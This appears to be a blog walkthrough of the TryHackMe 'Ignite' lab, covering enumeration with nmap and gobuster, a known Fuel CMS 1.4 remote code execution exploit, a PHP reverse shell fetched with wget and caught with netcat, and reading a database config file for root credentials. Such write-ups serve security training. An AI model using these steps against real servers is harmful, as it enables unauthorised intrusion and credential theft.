Tryhackme - Ignite

Tryhackme – Ignite

In this walk through, we will be going through the Ignite room from Tryhackme. This room consists of a webserver running a vulnerable version of a CMS. We have to find out the common misconfiguration to get the initial access with a known exploit and at last, have to root the machine with some easy privilege escalation vectors. So, let’s get started.


Machine Info:

TitleIgnite VM
ObjectiveA new start-up has a few issues with their web server.

Phase 1 – Enumeration

  • Checking if the machine is live or not.
pinging the machine.

  • Starting with an Nmap scan. Found a web server open at port 80.

wh1terose@fsociety:~$ sudo nmap -sS -sV
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( ) at 2023-03-28 20:47 IST

Nmap scan report for
Host is up (0.21s latency).
Not shown: 998 closed ports
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 27.71 seconds

nmap scan

  • It is running a CMS called Fuel CMS with version 1.4. Googling the version number, we found a RCE.

Fuel CMS Version 1.4


Phase 2 – Additional Recon

  • Fired up gobuster on the server to reveal some juicy endpoints.

wh1terose@fsociety:~$ gobuster dir -u -w ~/Desktop/Wordlist/common.txt 
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2023/03/28 20:58:09 Starting gobuster in directory enumeration mode
/.hta                 (Status: 403) [Size: 291]
/.htpasswd            (Status: 403) [Size: 296]
/.htaccess            (Status: 403) [Size: 296]
/0                    (Status: 200) [Size: 16595]
[ERROR] 2023/03/28 20:58:21 [!] Get "": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/@                    (Status: 400) [Size: 1134] 
/assets               (Status: 301) [Size: 313] [-->]
/home                 (Status: 200) [Size: 16595]                                
/index.php            (Status: 200) [Size: 16595]                                
/index                (Status: 200) [Size: 16595]                                
/lost+found           (Status: 400) [Size: 1134]                                 
/offline              (Status: 200) [Size: 70]                                   
/robots.txt           (Status: 200) [Size: 30]                                   
/server-status        (Status: 403) [Size: 300]                                  
2023/03/28 21:05:39 Finished

gobuster scan

  • Navigating across the web application shows the admin panel path and credentials to log into the dashboard. Nothing fancy here.
Fuel CMS admin panel

Fuel CMS Dashboard

Phase 3 – Initial access

  • Firing up the exploit found earlier.

python3 -u
Enter Command $wget

Enter Command $ls

  • The shell is not stable and only allow some limited commands. To upgrade it use Pentest monkey PHP reverse shell and download it via wget.


  • Trigger the shell by visiting the – http://serverip/reverseshell.php

netcat listener
  • Got the first user flag.

user flag

Phase 4 – Privilege escalation

  • While navigating across the application, found out the database config path. Viewing it we found our root password and later our root flag.

Install the database

cat /var/www/html/fuel/application/config/database.php

root credentials

root flag

Task 1 - Root it!

Also Read: Tryhackme – Hydra



So that was “Ignite” for you. We started off with our regular nmap scan and found the port 80 open. Next, we had a look at the web application running found out that it is running the Fuel CMS. Checking the CMS version 1.4 on Google reveals that it is vulnerable to a RCE. Using the exploit uploaded our PHP reverse for stability and got our initial access. After getting the user flag, we moved ahead to get the root. For the privilege escalation part, we found out the database config path while navigating around the web application. With the help of that, got the root credentials from the database. Using the credentials, i escalated to root and got the root flag.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top